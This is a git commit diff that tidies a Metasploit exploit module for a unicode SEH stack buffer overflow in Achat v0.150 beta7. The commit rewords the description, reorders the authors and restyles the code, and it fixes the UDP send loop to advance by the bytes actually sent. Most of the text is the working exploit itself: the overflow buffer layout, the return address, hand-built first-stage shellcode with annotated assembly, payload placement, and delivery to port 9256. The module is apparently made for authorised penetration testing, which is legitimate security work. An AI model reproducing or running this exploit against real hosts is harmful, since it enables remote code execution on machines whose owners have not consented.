Do minor cleanup

2015-02-09 17:33:05 -06:00 · 2015-02-09 17:33:05 -06:00 · 86f3bcad11
parent ac6879cfe1
commit 86f3bcad11
1 changed files with 24 additions and 28 deletions
--- a/modules/exploits/windows/misc/achat_beta.rb
+++ b/modules/exploits/windows/misc/achat_beta.rb
@ -15,17 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
      'Description'    => %q{
-         This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
-         by sending a crafted message to the default harcoded port 9256. The message
-         overflows the stack and overwrites the SEH handler. The exploit is reliable, but
-         depends of timing. It has two distinct threads that are overflowing the stack in
-         the same time. Tested on Windows XP SP3 and Windows 7.
-         The overflow was found by Peter Kasza.
+        This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
+        sending a crafted message to the default port 9256 it's possible to overwrites the
+        SEH handler. Even when the exploit is reliable it depends of timing since there are
+        two threads overflowing the stack in the same time. This module has been tested on
+        Windows XP SP3 and Windows 7.
      },
      'Author'         =>
        [
-         'Balazs Bucsay <balazs.bucsay[-at-]rycon[-dot-]hu>', # Exploit, Metasploit module
-         'Peter Kasza <peter.kasza[-at-]itinsight[-dot-]hu>' # Vulnerability discovery
+          'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
+          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
        ],
      'License'	       => MSF_LICENSE,
      'References'     =>
@ -45,16 +44,15 @@ class Metasploit3 < Msf::Exploit::Remote
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions'  =>
            {
-              'BufferRegister' => 'EAX',
+              'BufferRegister' => 'EAX'
            }
-
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
-        # Tested OK Windows XP SP3, Windows 7
-        # Not working on Windows Server 2003
-          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1',   { 'Ret' => "\x2A\x46" } ], #AChat.exe
+          # Tested OK Windows XP SP3, Windows 7
+          # Not working on Windows Server 2003
+          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
@ -62,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote

    register_options(
      [
-        Opt::RPORT(9256),
+        Opt::RPORT(9256)
      ], self.class)
  end

@ -85,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 59               POP ECX                  # padding
    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
-    firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
+    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"

-    sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
-    sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
-    sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset
+    sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
+    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
+    sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
    sploit << "\x61\x40" # POPAD + INC EAX

    sploit << target.ret # AChat.exe p/p/r address

    # adjusting the first thread's unicode payload, tricky asm-fu
-    # the first seh exception jumps here, firststage variable will be executed
+    # the first seh exception jumps here, first_stage variable will be executed
    # by the second seh exception as well. It needs to be in sync with the second
    # thread, so that is why we adjust eax/ebp to have a close pointer to the
-    # payload, then firststage variable will take the rest of the job.
+    # payload, then first_stage variable will take the rest of the job.
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 55               PUSH EBP                 # ebp with close pointer to payload
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
@ -113,22 +111,20 @@ class Metasploit3 < Msf::Exploit::Remote
    # 50               PUSH EAX			# saving eax
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 5D               POP EBP			# mov ebp, eax
-    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
+    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
    sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
-    sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
-    sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload
-    sploit << "\x00" + "A"*10 + "\x00"
-
+    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
+    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
+    sploit << "\x00" + 'A' * 10 + "\x00"

    i = 0
    while i < sploit.length do
      if i > 172000
        Rex::sleep(1.0)
      end
-      udp_sock.put(sploit[i..i+8192-1])
-      i += 8192
+      sent = udp_sock.put(sploit[i..i + 8192 - 1])
+      i += sent
    end
-
    disconnect_udp
  end